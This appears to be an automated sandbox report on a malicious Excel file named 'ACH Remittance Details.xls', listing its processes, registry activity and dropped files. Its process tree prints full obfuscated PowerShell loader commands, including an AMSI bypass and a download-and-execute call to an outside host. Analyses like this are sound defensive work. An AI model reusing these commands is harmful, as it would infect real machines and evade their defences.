Analysis
-
max time kernel: 21s
max time network: 130s
platform: windows10_x64
resource: win10v20201028
submitted: 18-01-2021 18:23

Tasks:
- Static task: static1
- Behavioral task: behavioral1; Sample: ACH Remittance Details.xls; Resource: win7v20201028
- Behavioral task: behavioral2; Sample: ACH Remittance Details.xls; Resource: win10v20201028
General
-
Target: ACH Remittance Details.xls
Size: 35KB
MD5: b3931a02644f28eaee7711d36333eece
SHA1: 72e0ab0c9b992f94db5ae45022df57f1522b9895
SHA256: d36d950e9c94564bcb37f058d4ba3636281a273fd59d7eac0f3dc8fa215b5590
SHA512: 5202adec9629fc94eaa70d2e6d62212a9ebde57e9d7e89709f33efd4fd54ab8f44c699fb9c4553b8b640273305ce73a0aece8a4935fef9c67c0d4c60ffd4da63
Malware Config
Signatures
-
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
  pid: 2736 (process: powershell.exe)
  pid_target: 3884 (target process: EXCEL.EXE)

Blocklisted process makes network request (2 IoCs)
Processes (flow, pid, process):
  16  2736  powershell.exe
  25  2208  powershell.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                      EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description, ioc, process):
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS               EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE

Modifies registry class (1 IoC)
Processes (description, ioc, process):
  Key created  \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings  powershell.exe

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (pid, process):
  3884  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid, process):
  2736  powershell.exe  (3 entries)
  2208  powershell.exe  (3 entries)

Suspicious use of AdjustPrivilegeToken (44 IoCs)
Processes (token, pid, process):
  SeDebugPrivilege  2736  powershell.exe
  SeDebugPrivilege  2208  powershell.exe
  The following 21 tokens were each adjusted twice by PID 2208 (powershell.exe), accounting for the remaining 42 entries:
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes (pid, process):
  3884  EXCEL.EXE  (2 entries)

Suspicious use of SetWindowsHookEx (12 IoCs)
Processes (pid, process):
  3884  EXCEL.EXE  (12 entries)

Suspicious use of WriteProcessMemory (8 IoCs)
Processes (description, pid, process, target process):
  PID 3884 wrote to memory of 2736  3884  EXCEL.EXE       powershell.exe  (2 entries)
  PID 2736 wrote to memory of 2152  2736  powershell.exe  WScript.exe     (2 entries)
  PID 2152 wrote to memory of 2208  2152  WScript.exe     powershell.exe  (2 entries)
  PID 2152 wrote to memory of 3756  2152  WScript.exe     cmd.exe         (2 entries)
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1, PID 3884)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH Remittance Details.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 2736, child of 3884)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gh47gh7='92%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%02%B3%85%06%54%06%94%C7%72%92%72%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%72%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%C2%72%72%37%26%67%E2%47%E6%56%96%C6%34%02%46%56%47%36%56%47%F6%27%05%F2%23%76%E6%96%B6%F2%D6%F6%36%E2%37%27%56%76%16%E6%16%D6%97%47%27%56%07%F6%27%07%16%D6%16%26%16%C6%16%F2%F2%A3%07%47%47%86%72%72%82%56%72%B2%72%C6%96%72%B2%72%64%72%B2%72%46%72%B2%72%16%F6%72%B2%72%C6%E6%72%B2%72%77%F6%72%B2%72%44%E2%72%B2%72%92%47%E6%56%72%B2%72%96%C6%72%B2%72%34%72%B2%72%26%56%72%B2%72%75%72%B2%72%E2%47%72%B2%72%56%E4%72%02%B2%72%02%47%36%72%B2%72%56%A6%72%B2%72%26%F4%72%B2%72%D2%77%72%B2%72%56%E4%82%72';$text = $gh47gh7.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WScript.exe (depth 3, PID 2152, child of 2736)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\notepad.vbs"
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4, PID 2208, child of 2152)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$lFeLwjZnnuqoqqmcWTtn='64%6F%20%7B%24%70%69%6E%67%20%3D%20%74%65%73%74%2D%63%6F%6E%6E%65%63%74%69%6F%6E%20%2D%63%6F%6D%70%20%67%6F%6F%67%6C%65%2E%63%6F%6D%20%2D%63%6F%75%6E%74%20%31%20%2D%51%75%69%65%74%7D%20%75%6E%74%69%6C%20%28%24%70%69%6E%67%29%3B%24%74%35%36%66%67%20%3D%20%5B%45%6E%75%6D%5D%3A%3A%54%6F%4F%62%6A%65%63%74%28%5B%53%79%73%74%65%6D%2E%4E%65%74%2E%53%65%63%75%72%69%74%79%50%72%6F%74%6F%63%6F%6C%54%79%70%65%5D%2C%20%33%30%37%32%29%3B%5B%53%79%73%74%65%6D%2E%4E%65%74%2E%53%65%72%76%69%63%65%50%6F%69%6E%74%4D%61%6E%61%67%65%72%5D%3A%3A%53%65%63%75%72%69%74%79%50%72%6F%74%6F%63%6F%6C%20%3D%20%24%74%35%36%66%67%3B%5B%52%65%66%5D%2E%41%73%73%65%6D%62%6C%79%2E%47%65%74%54%79%70%65%28%27%53%79%27%2B%27%73%74%65%6D%2E%27%2B%27%4D%61%6E%61%27%2B%27%67%65%6D%27%2B%27%65%6E%74%27%2B%27%2E%41%75%74%6F%6D%27%2B%27%61%74%69%6F%27%2B%27%6E%2E%41%27%2B%27%6D%27%2B%27%73%69%27%2B%27%55%74%69%6C%73%27%29%2E%47%65%74%46%69%65%6C%64%28%27%61%27%2B%27%6D%73%27%2B%27%69%49%27%2B%27%6E%69%74%46%61%27%2B%27%69%6C%65%64%27%2C%27%4E%6F%6E%40%40%40%27%2E%72%65%70%6C%61%63%65%28%27%40%40%40%27%2C%27%50%75%62%27%29%2B%27%6C%69%63%2C%53%27%2B%27%74%61%74%69%63%27%29%2E%53%65%74%56%61%6C%75%65%28%24%6E%75%6C%6C%2C%24%74%72%75%65%29%3B%24%74%74%79%3D%27%28%4E%65%77%2D%27%2B%27%4F%62%6A%65%27%2B%27%63%74%20%4E%65%27%2B%27%74%2E%57%65%27%2B%27%62%43%6C%69%27%2B%27%65%6E%74%29%27%7C%49%60%45%60%58%3B%5B%76%6F%69%64%5D%20%5B%53%79%73%74%65%6D%2E%52%65%66%6C%65%63%74%69%6F%6E%2E%41%73%73%65%6D%62%6C%79%5D%3A%3A%4C%6F%61%64%57%69%74%68%50%61%72%74%69%61%6C%4E%61%6D%65%28%27%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%27%29%3B%24%6D%76%3D%20%5B%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%2E%49%6E%74%65%72%61%63%74%69%6F%6E%5D%3A%3A%43%61%6C%6C%42%79%6E%61%6D%65%28%24%74%74%79%2C%27%44%6F%77%6E%6C%6F%61%64%53%74%72%69%6E%67%27%2C%5B%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%2E%43%61%6C%6C%54%79%70%65%5D%3A%3A%4D%65%74%68%6F%64%2C%27%68%74%74%70%73%3A%2F%2F%61%6C%61%62%61%6D%61%70%72%6F%70%65%72%74%79%6D%61%6E%61%67%65%72%73%2E%63%6F%6D%2F%6B%69%6E%67%2F%66%6F%6C%64%65%72%2F%41%74%74%61%63%6B%2E%6A%70%67%27%29%3B%24%72%37%38%66%64%30%30%30%73%64%3D%20%24%6D%76%20%2D%73%70%6C%69%74%20%27%25%27%20%7C%46%6F%72%45%61%63%68%2D%4F%62%6A%65%63%74%20%7B%5B%63%68%61%72%5D%5B%62%79%74%65%5D%22%30%78%24%5F%22%7D%3B%24%79%35%6A%68%36%32%64%66%30%3D%20%24%72%37%38%66%64%30%30%30%73%64%20%2D%6A%6F%69%6E%20%27%27%7C%49%60%45%60%58';$DFG45DFG0=$lFeLwjZnnuqoqqmcWTtn.Split('%') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\cmd.exe (depth 4, PID 3756, child of 2152)
        Command line: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\notepad.vbs" "C:\Users\Admin\AppData\Local" /Y
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: ea6243fdb2bfcca2211884b0a21a0afc
  SHA1: 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
  SHA256: 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
  SHA512: 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: f6e7c3250025e07834a97fa50efdb12c
  SHA1: 26a6432727eaee088454bf8d3eb5f44a6dccfe8a
  SHA256: ff1e720e410ddf42092c2ca030b5e8f3d1ffb1435c126e0ddae5a330b1d4c20a
  SHA512: 01bbd54911e6798b68265c1b121b71f4119c4ab92bdd65b44854295bd7ea0399ff35519231604f32e09048f47eaf075e528d555786745cf8c3670a81519df56b
-
C:\Users\Admin\AppData\Roaming\notepad.vbs
  MD5: 7c2461575cefe582992751922a989015
  SHA1: 9fbe120ebe0a97597498ccb9b73754b9f02933e8
  SHA256: f3ea24d2f5b3b3e13a9d7c4a57e919c83227a48e52e02ea0765e429552a3f7be
  SHA512: 43c3fc5a12ddf32ccef5cb7e0ccd9dedb913baa0f6247d1a6b7758750278f90a42fe2b81a87d75453f915cbb71bccf5a07599c57df54a72fde14b155b0dceb8c
-
Memory dumps (file, filesize):
  memory/2152-14-0x0000000000000000-mapping.dmp
  memory/2208-26-0x000001EE17F96000-0x000001EE17F98000-memory.dmp  8KB
  memory/2208-25-0x000001EE19900000-0x000001EE19901000-memory.dmp  4KB
  memory/2208-24-0x000001EE17F93000-0x000001EE17F95000-memory.dmp  8KB
  memory/2208-23-0x000001EE17F90000-0x000001EE17F92000-memory.dmp  8KB
  memory/2208-19-0x00007FFF62E50000-0x00007FFF6383C000-memory.dmp  9.9MB
  memory/2208-16-0x0000000000000000-mapping.dmp
  memory/2736-12-0x0000021EBA143000-0x0000021EBA145000-memory.dmp  8KB
  memory/2736-13-0x0000021EBA146000-0x0000021EBA148000-memory.dmp  8KB
  memory/2736-11-0x0000021EBA140000-0x0000021EBA142000-memory.dmp  8KB
  memory/2736-10-0x0000021EBA440000-0x0000021EBA441000-memory.dmp  4KB
  memory/2736-9-0x0000021EBA290000-0x0000021EBA291000-memory.dmp   4KB
  memory/2736-8-0x00007FFF62E50000-0x00007FFF6383C000-memory.dmp   9.9MB
  memory/2736-7-0x0000000000000000-mapping.dmp
  memory/3756-17-0x0000000000000000-mapping.dmp
  memory/3884-2-0x00007FFF49320000-0x00007FFF49330000-memory.dmp   64KB
  memory/3884-6-0x00007FFF49320000-0x00007FFF49330000-memory.dmp   64KB
  memory/3884-5-0x00007FFF6D2A0000-0x00007FFF6D8D7000-memory.dmp   6.2MB
  memory/3884-4-0x00007FFF49320000-0x00007FFF49330000-memory.dmp   64KB
  memory/3884-3-0x00007FFF49320000-0x00007FFF49330000-memory.dmp   64KB